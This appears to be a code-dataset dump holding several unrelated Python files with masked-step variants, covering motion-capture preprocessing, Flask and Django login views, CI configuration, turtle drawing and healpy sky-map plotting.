"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import os, pickle, logging, numpy as np
from .. import utils as U
class CMU_Generator():
def __init__(self, args, dataset_args):
self.in_path = dataset_args['cmu_data_path']
self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)
self.actions = ['walking', 'running', 'directing_traffic', 'soccer',
'basketball', 'washwindow', 'jumping', 'basketball_signal']
self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26,
39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83,
87, 88, 89, 90, 91, 92, 108, 109, 110, 114, 115, 116]
self.dim_use = list(set(range(39*3)).difference(set(self.dim_ignore)))
U.create_folder(self.out_path)
def start(self):
logging.info('Reading data ...')
self.all_train_data, train_data = self.read_data('train')
_, eval_data = self.read_data('test')
logging.info('Normalizing data ...')
self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = self.normalize_state()
train_data = self.normalize_data(train_data)
eval_data = self.normalize_data(eval_data)
logging.info('Saving data ...')
with open('{}/data.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((train_data, eval_data, self.actions), f)
with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero), f)
with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:
pickle.dump((self.dim_use, self.dim_ignore), f)
def read_data(self, phase):
all_data, even_data = [], {}
for action_idx, action in enumerate(self.actions):
action_path = '{}/{}/{}'.format(self.in_path, phase, action)
for sequence_idx, file in enumerate(os.listdir(action_path)):
sequence = []
with open('{}/{}'.format(action_path, file), 'r') as f:
for line in f.readlines():
line = line.strip().split(',')
if len(line) > 0:
sequence.append(np.array([np.float32(x) for x in line]))
sequence = np.array(sequence)
all_data.append(sequence)
even_data[(action_idx, sequence_idx)] = sequence[range(0,sequence.shape[0],2),:]
return np.concatenate(all_data, axis=0), even_data
def normalize_state(self):
data_mean = np.mean(self.all_train_data, axis=0)
data_std = np.std(self.all_train_data, axis=0)
dim_zero = list(np.where(data_std < 0.0001)[0])
dim_nonzero = list(np.where(data_std >= 0.0001)[0])
data_std[dim_zero] = 1.0
return data_mean, data_std, dim_zero, dim_nonzero
def normalize_data(self, data):
for key in data.keys():
data[key] = np.divide((data[key] - self.data_mean), self.data_std)
data[key] = data[key][:, self.dim_use]
return data
|
normal
|
{
"blob_id": "2c58a9e83f80d437160b87ec64c7631e7a35bf90",
"index": 6315,
"step-1": "<mask token>\n\n\nclass CMU_Generator:\n <mask token>\n <mask token>\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n <mask token>\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-2": "<mask token>\n\n\nclass CMU_Generator:\n\n def __init__(self, args, dataset_args):\n self.in_path = dataset_args['cmu_data_path']\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, \n 26, 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83, 87, 88, 89,\n 90, 91, 92, 108, 109, 110, 114, 115, 116]\n self.dim_use = list(set(range(39 * 3)).difference(set(self.dim_ignore))\n )\n U.create_folder(self.out_path)\n <mask token>\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n\n def normalize_state(self):\n data_mean = np.mean(self.all_train_data, axis=0)\n data_std = np.std(self.all_train_data, axis=0)\n dim_zero = list(np.where(data_std < 0.0001)[0])\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\n data_std[dim_zero] = 1.0\n return data_mean, data_std, dim_zero, dim_nonzero\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-3": "<mask token>\n\n\nclass CMU_Generator:\n\n def __init__(self, args, dataset_args):\n self.in_path = dataset_args['cmu_data_path']\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, \n 26, 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83, 87, 88, 89,\n 90, 91, 92, 108, 109, 110, 114, 115, 116]\n self.dim_use = list(set(range(39 * 3)).difference(set(self.dim_ignore))\n )\n U.create_folder(self.out_path)\n\n def start(self):\n logging.info('Reading data ...')\n self.all_train_data, train_data = self.read_data('train')\n _, eval_data = self.read_data('test')\n logging.info('Normalizing data ...')\n self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = (self\n .normalize_state())\n train_data = self.normalize_data(train_data)\n eval_data = self.normalize_data(eval_data)\n logging.info('Saving data ...')\n with open('{}/data.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((train_data, eval_data, self.actions), f)\n with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.data_mean, self.data_std, self.dim_zero, self\n .dim_nonzero), f)\n with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.dim_use, self.dim_ignore), f)\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n\n def normalize_state(self):\n data_mean = np.mean(self.all_train_data, axis=0)\n data_std = np.std(self.all_train_data, axis=0)\n dim_zero = list(np.where(data_std < 0.0001)[0])\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\n data_std[dim_zero] = 1.0\n return data_mean, data_std, dim_zero, dim_nonzero\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-4": "import os, pickle, logging, numpy as np\nfrom .. import utils as U\n\n\nclass CMU_Generator:\n\n def __init__(self, args, dataset_args):\n self.in_path = dataset_args['cmu_data_path']\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, \n 26, 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83, 87, 88, 89,\n 90, 91, 92, 108, 109, 110, 114, 115, 116]\n self.dim_use = list(set(range(39 * 3)).difference(set(self.dim_ignore))\n )\n U.create_folder(self.out_path)\n\n def start(self):\n logging.info('Reading data ...')\n self.all_train_data, train_data = self.read_data('train')\n _, eval_data = self.read_data('test')\n logging.info('Normalizing data ...')\n self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = (self\n .normalize_state())\n train_data = self.normalize_data(train_data)\n eval_data = self.normalize_data(eval_data)\n logging.info('Saving data ...')\n with open('{}/data.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((train_data, eval_data, self.actions), f)\n with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.data_mean, self.data_std, self.dim_zero, self\n .dim_nonzero), f)\n with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:\n pickle.dump((self.dim_use, self.dim_ignore), f)\n\n def read_data(self, phase):\n all_data, even_data = [], {}\n for action_idx, action in enumerate(self.actions):\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\n for sequence_idx, file in enumerate(os.listdir(action_path)):\n sequence = []\n with open('{}/{}'.format(action_path, file), 'r') as f:\n for line in f.readlines():\n line = line.strip().split(',')\n if len(line) > 0:\n sequence.append(np.array([np.float32(x) for x in\n line]))\n sequence = np.array(sequence)\n all_data.append(sequence)\n even_data[action_idx, sequence_idx] = sequence[range(0,\n sequence.shape[0], 2), :]\n return np.concatenate(all_data, axis=0), even_data\n\n def normalize_state(self):\n data_mean = np.mean(self.all_train_data, axis=0)\n data_std = np.std(self.all_train_data, axis=0)\n dim_zero = list(np.where(data_std < 0.0001)[0])\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\n data_std[dim_zero] = 1.0\n return data_mean, data_std, dim_zero, dim_nonzero\n\n def normalize_data(self, data):\n for key in data.keys():\n data[key] = np.divide(data[key] - self.data_mean, self.data_std)\n data[key] = data[key][:, self.dim_use]\n return data\n",
"step-5": "import os, pickle, logging, numpy as np\r\n\r\nfrom .. import utils as U\r\n\r\n\r\nclass CMU_Generator():\r\n def __init__(self, args, dataset_args):\r\n self.in_path = dataset_args['cmu_data_path']\r\n self.out_path = '{}/{}'.format(dataset_args['path'], args.dataset)\r\n self.actions = ['walking', 'running', 'directing_traffic', 'soccer',\r\n 'basketball', 'washwindow', 'jumping', 'basketball_signal']\r\n self.dim_ignore = [0, 1, 2, 3, 4, 5, 6, 7, 8, 21, 22, 23, 24, 25, 26,\r\n 39, 40, 41, 60, 61, 62, 63, 64, 65, 81, 82, 83,\r\n 87, 88, 89, 90, 91, 92, 108, 109, 110, 114, 115, 116]\r\n self.dim_use = list(set(range(39*3)).difference(set(self.dim_ignore)))\r\n U.create_folder(self.out_path)\r\n\r\n def start(self):\r\n logging.info('Reading data ...')\r\n self.all_train_data, train_data = self.read_data('train')\r\n _, eval_data = self.read_data('test')\r\n\r\n logging.info('Normalizing data ...')\r\n self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero = self.normalize_state()\r\n train_data = self.normalize_data(train_data)\r\n eval_data = self.normalize_data(eval_data)\r\n\r\n logging.info('Saving data ...')\r\n with open('{}/data.pkl'.format(self.out_path), 'wb') as f:\r\n pickle.dump((train_data, eval_data, self.actions), f)\r\n with open('{}/normalization.pkl'.format(self.out_path), 'wb') as f:\r\n pickle.dump((self.data_mean, self.data_std, self.dim_zero, self.dim_nonzero), f)\r\n with open('{}/ignore.pkl'.format(self.out_path), 'wb') as f:\r\n pickle.dump((self.dim_use, self.dim_ignore), f)\r\n\r\n def read_data(self, phase):\r\n all_data, even_data = [], {}\r\n for action_idx, action in enumerate(self.actions):\r\n action_path = '{}/{}/{}'.format(self.in_path, phase, action)\r\n for sequence_idx, file in enumerate(os.listdir(action_path)):\r\n sequence = []\r\n with open('{}/{}'.format(action_path, file), 'r') as f:\r\n for line in f.readlines():\r\n line = line.strip().split(',')\r\n if len(line) > 0:\r\n sequence.append(np.array([np.float32(x) for x in line]))\r\n sequence = np.array(sequence)\r\n all_data.append(sequence)\r\n even_data[(action_idx, sequence_idx)] = sequence[range(0,sequence.shape[0],2),:]\r\n return np.concatenate(all_data, axis=0), even_data\r\n\r\n def normalize_state(self):\r\n data_mean = np.mean(self.all_train_data, axis=0)\r\n data_std = np.std(self.all_train_data, axis=0)\r\n dim_zero = list(np.where(data_std < 0.0001)[0])\r\n dim_nonzero = list(np.where(data_std >= 0.0001)[0])\r\n data_std[dim_zero] = 1.0\r\n return data_mean, data_std, dim_zero, dim_nonzero\r\n\r\n def normalize_data(self, data):\r\n for key in data.keys():\r\n data[key] = np.divide((data[key] - self.data_mean), self.data_std)\r\n data[key] = data[key][:, self.dim_use]\r\n return data\r\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
import math
import turtle
wn = turtle.Screen()
wn.bgcolor('lightblue')
PI=3.14
R_outer=50
R_inner=200
fred = turtle.Turtle()
fred.speed(99999)
def cycloid(r, k, nos_cycle, direction):
n=36
angle=2*PI/n
x=1
y=0
for i in range(nos_cycle*n):
        beta = i * angle
        x = r*(beta-math.sin(beta))
        y = r*(1-math.cos(beta))
        ### equally valid
        ###x = ((r)*math.cos(beta) + r*beta)
        ###y = direction*(r)*math.sin(beta)
        fred.goto(x,y)
cycloid(10, 0.1, 100, -1)
wn.exitonclick()
|
normal
|
{
"blob_id": "a62dd287f9fc6f79ef95a3de83f52c794efe00a7",
"index": 7407,
"step-1": "\nimport math\nimport turtle\n\nwn = turtle.Screen()\nwn.bgcolor('lightblue')\nPI=3.14\nR_outer=50\nR_inner=200\n\nfred = turtle.Turtle()\nfred.speed(99999)\n\ndef cycloid(r, k, nos_cycle, direction):\n n=36\n angle=2*PI/n\n x=1\n y=0\n for i in range(nos_cycle*n):\n\t beta = i * angle \n\t x = r*(beta-math.sin(beta))\n\t y = r*(1-math.cos(beta))\n\t ### equally valid\n ###x = ((r)*math.cos(beta) + r*beta)\n ###y = direction*(r)*math.sin(beta)\n fred.goto(x,y)\n\ncycloid(10, 0.1, 100, -1)\n\nwn.exitonclick()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
password = '#Garb1122'
|
normal
|
{
"blob_id": "918358f6e8e3f1c601b18a3c08fc6b7c024721ba",
"index": 5547,
"step-1": "<mask token>\n",
"step-2": "password = '#Garb1122'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os
from flask import Flask
from flask.ext.login import LoginManager
from config import basedir
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.openid import OpenID
from momentjs import momentjs
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
lm = LoginManager()
lm.init_app(app)
app.jinja_env.globals['momentjs'] = momentjs
from app import views, models
|
normal
|
{
"blob_id": "8c1bd4df5f33c433880d6a4becadf88fb922762b",
"index": 6379,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp.config.from_object('config')\n<mask token>\nlm.init_app(app)\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nlm = LoginManager()\nlm.init_app(app)\napp.jinja_env.globals['momentjs'] = momentjs\n<mask token>\n",
"step-4": "import os\nfrom flask import Flask\nfrom flask.ext.login import LoginManager\nfrom config import basedir\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.openid import OpenID\nfrom momentjs import momentjs\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nlm = LoginManager()\nlm.init_app(app)\napp.jinja_env.globals['momentjs'] = momentjs\nfrom app import views, models\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# i have created this file-hitu
from django.http import HttpResponse
from django.shortcuts import render
from .forms import Sign_Up, Login
from .models import Student
# render is used to create and impot the templates
# render takes first arg = request, 2nd arg = name of the file you want to import, 3rd arg = parameters or variable name
def index(request):
return render(request, 'index.html')
def get_name(request):
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = Sign_Up(request.POST)
# check whether it's valid:
if form.is_valid():
firstName = form.cleaned_data['first_name']
lastName = form.cleaned_data['last_name']
email = form.cleaned_data['email']
password = form.cleaned_data['password']
details = Student(first_name=firstName, last_name=lastName, email=email,
password=password) # these are models variable in red
# process the data in form.cleaned_data as required
details.save() # this is used to save all the details
# ...
# redirect to a new URL:
return render(request, 'login/new_index.html', {'form': form})
# if a GET (or any other method) we'll create a blank form
else:
form = Sign_Up()
return render(request, 'login/new_index.html', {'form': form})
def login_name(request):
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = Login(request.POST)
# check whether it's valid:
if form.is_valid():
email = form.cleaned_data['email']
password = form.cleaned_data['password']
return render(request, 'login/new_index.html', {'form': form})
# if a GET (or any other method) we'll create a blank form
else:
form = Login()
return render(request, 'login/new_index.html', {'form': form})
|
normal
|
{
"blob_id": "cbbb314a3262713f6cb2bb2dd90709d7bf1ca8eb",
"index": 6095,
"step-1": "<mask token>\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-2": "<mask token>\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\n<mask token>\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-3": "<mask token>\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef get_name(request):\n if request.method == 'POST':\n form = Sign_Up(request.POST)\n if form.is_valid():\n firstName = form.cleaned_data['first_name']\n lastName = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n details = Student(first_name=firstName, last_name=lastName,\n email=email, password=password)\n details.save()\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Sign_Up()\n return render(request, 'login/new_index.html', {'form': form})\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-4": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .forms import Sign_Up, Login\nfrom .models import Student\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef get_name(request):\n if request.method == 'POST':\n form = Sign_Up(request.POST)\n if form.is_valid():\n firstName = form.cleaned_data['first_name']\n lastName = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n details = Student(first_name=firstName, last_name=lastName,\n email=email, password=password)\n details.save()\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Sign_Up()\n return render(request, 'login/new_index.html', {'form': form})\n\n\ndef login_name(request):\n if request.method == 'POST':\n form = Login(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n return render(request, 'login/new_index.html', {'form': form})\n else:\n form = Login()\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-5": "# i have created this file-hitu\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .forms import Sign_Up, Login\nfrom .models import Student\n\n\n# render is used to create and impot the templates\n# render takes first arg = request, 2nd arg = name of the file you want to import, 3rd arg = parameters or variable name\ndef index(request):\n return render(request, 'index.html')\n\n\ndef get_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = Sign_Up(request.POST)\n # check whether it's valid:\n if form.is_valid():\n firstName = form.cleaned_data['first_name']\n lastName = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n details = Student(first_name=firstName, last_name=lastName, email=email,\n password=password) # these are models variable in red\n # process the data in form.cleaned_data as required\n details.save() # this is used to save all the details\n # ...\n # redirect to a new URL:\n return render(request, 'login/new_index.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = Sign_Up()\n\n return render(request, 'login/new_index.html', {'form': form})\n\n\ndef login_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = Login(request.POST)\n # check whether it's valid:\n if form.is_valid():\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n\n return render(request, 'login/new_index.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = Login()\n\n return render(request, 'login/new_index.html', {'form': form})\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
#
# Copyright (C) Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
GERRIT_PORT = 29418
GERRIT_USERNAME = 'dci-ci-bot'
GERRIT_HOSTNAME = 'softwarefactory-project.io'
GERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',
'/home/dci/dci-ci-bot.id_rsa')
RHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')
RHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')
RHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')
HOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME', '/home/dci/.ssh/id_rsa')
|
normal
|
{
"blob_id": "8410ff0806766a09d346e930123a2696bebb4b60",
"index": 2821,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGERRIT_PORT = 29418\nGERRIT_USERNAME = 'dci-ci-bot'\nGERRIT_HOSTNAME = 'softwarefactory-project.io'\nGERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',\n '/home/dci/dci-ci-bot.id_rsa')\nRHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')\nRHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')\nRHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')\nHOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME',\n '/home/dci/.ssh/id_rsa')\n",
"step-3": "import os\nGERRIT_PORT = 29418\nGERRIT_USERNAME = 'dci-ci-bot'\nGERRIT_HOSTNAME = 'softwarefactory-project.io'\nGERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',\n '/home/dci/dci-ci-bot.id_rsa')\nRHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')\nRHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')\nRHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')\nHOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME',\n '/home/dci/.ssh/id_rsa')\n",
"step-4": "# -*- coding: utf-8 -*-\n#\n# Copyright (C) Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nGERRIT_PORT = 29418\nGERRIT_USERNAME = 'dci-ci-bot'\nGERRIT_HOSTNAME = 'softwarefactory-project.io'\nGERRIT_SSH_KEY_FILENAME = os.getenv('GERRIT_SSH_KEY_FILENAME',\n '/home/dci/dci-ci-bot.id_rsa')\nRHEL_AGENT_DIR = os.getenv('RHEL_AGENT_DIR', '/opt/dci-rhel-agent')\nRHEL_DCI_CLIENT_ID = os.getenv('DCI_CLIENT_ID')\nRHEL_DCI_API_SECRET = os.getenv('DCI_API_SECRET')\n\nHOST_SSH_KEY_FILENAME = os.getenv('HOST_SSH_KEY_FILENAME', '/home/dci/.ssh/id_rsa')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
pass
|
normal
|
{
"blob_id": "0ae626df5a471af77f7361bb765b46b861ee8a2c",
"index": 7142,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-3": "import terrascript\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-4": "# terrascript/spotinst/__init__.py\n\nimport terrascript\n\nclass spotinst(terrascript.Provider):\n pass",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
from math import factorial
F = [factorial(i) for i in range(10)]
#F[9] * 8 = 2903040 > this means no 8 digit numbers
#F[9] * 7 = 2540160 < this is the maximum that I could think of
total = 0
for i in xrange(10, 2540160):
if sum([F[int(d)] for d in str(i)]) == i:
total = total + i
print total
|
normal
|
{
"blob_id": "d2e8c95dc144aa83128cc815ad145982f64b1819",
"index": 3206,
"step-1": "#!/usr/bin/env python\n\nfrom math import factorial\n\nF = [factorial(i) for i in range(10)]\n#F[9] * 8 = 2903040 > this means no 8 digit numbers\n#F[9] * 7 = 2540160 < this is the maximum that I could think of\n\ntotal = 0\nfor i in xrange(10, 2540160):\n if sum([F[int(d)] for d in str(i)]) == i:\n total = total + i\n\nprint total\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from skimage import data, filters, measure, exposure
from skimage.filters import threshold_mean
from skimage.transform import resize
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import pyfits as pf
import time
import numpy as np
import healpy as hp
from healpy.projector import CartesianProj
from healpy.projector import MollweideProj
# [email protected]
start = time.time()
path = '/Users/trygveleithesvalheim/datafiles/'
# MAX SLIDES ON N: 134 (ID:135) and 136 (ID:137)
# MAX SLIDES ON S: 6 (ID:7)
# Data: 360 degrees longitude, 50-90 latitude
# Dimensions: (480,4320)
# Full map: (2160,4320) need to add 1680
NN = 338 # Identified clouds in N. hemisphere
NS = 438 # Identified clouds in S. hemisphere
nside = 512
npix = 12*nside**2
z = np.zeros((1680, 4320)) # Extra array for full sky array
"""
full
"""
c1 = 420
c2 = 475
hdulist = pf.open(path+'data/cubesCombinedN.fits')
Nfull = hdulist[0].data
hdulist = pf.open(path+'data/cubesCombinedS.fits')
Sfull = hdulist[0].data
fullLOSN = Nfull[c1:c2].sum(axis=(0))
fullLOSS = Sfull[c1:c2].sum(axis=(0))
# Add empty array for converting to full sky
fullLOSS = np.concatenate((fullLOSS, z), axis=0)
fullLOSN = np.concatenate((z,fullLOSN), axis=0)
full = fullLOSN + fullLOSS
"""
Add full first
"""
hdulist = pf.open(path+'data/LOScloudsN.fits')
LOScloudsN = hdulist[0].data
hdulist = pf.open(path+'data/LOScloudsS.fits')
LOScloudsS = hdulist[0].data
# LOS of all clouds
LOScloudsN = LOScloudsN.sum(axis=(0))
LOScloudsS = LOScloudsS.sum(axis=(0))
# Add empty array for converting to full sky
LOScloudsS = np.concatenate((LOScloudsS, z), axis=0)
LOScloudsN = np.concatenate((z,LOScloudsN), axis=0)
# Add N and S hemisphere
image_array = LOScloudsN+LOScloudsS
"""
GENERAL
"""
# Find theta and phi coordinates of image
theta = np.linspace(0, np.pi, num=image_array.shape[0])[:, None]
phi = np.linspace(-np.pi, np.pi, num=image_array.shape[1])
# Get pixel positions of full picture
pix = hp.ang2pix(nside, theta, phi)
"""
GENERAL END
"""
# Make healpix map array
healpix_map = np.zeros(hp.nside2npix(nside), dtype=np.double)
# put image in healpy map array
healpix_map[pix] = image_array # Magic
#healpix_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN
"""
For full
"""
full_map = np.zeros(hp.nside2npix(nside), dtype=np.double)
full_map[pix] = full # Magic
#full_map[np.where(healpix_map == 0)] = hp.UNSEEN # Set empty pixels to UNSEEN
"""
Full end
"""
le = full_map - healpix_map
ma = le[::-1]
ma[np.where(ma == 0)] = hp.UNSEEN
full_map[np.where(full_map == 0)] = hp.UNSEEN
fu = full_map[::-1]
healpix_map[np.where(healpix_map == 0)] = hp.UNSEEN
se = healpix_map[::-1]
"""
hp.write_map(path+'data/fullHI50.fits',fu, partial=True)
hp.write_map(path+'data/segmentedHI50.fits',se, partial=True)
hp.write_map(path+'data/cloudsFITS/subtractedHI50fits',ma, partial=True)
"""
#min = 4.
#max = 350.
hp.mollview(fu,title="Full map +50 GLAT",sub=311)
hp.mollview(se,title="Above threshold (4.0) +50 GLAT", sub = 312)
hp.mollview(ma,title="Diff +50 GLAT",sub=313)
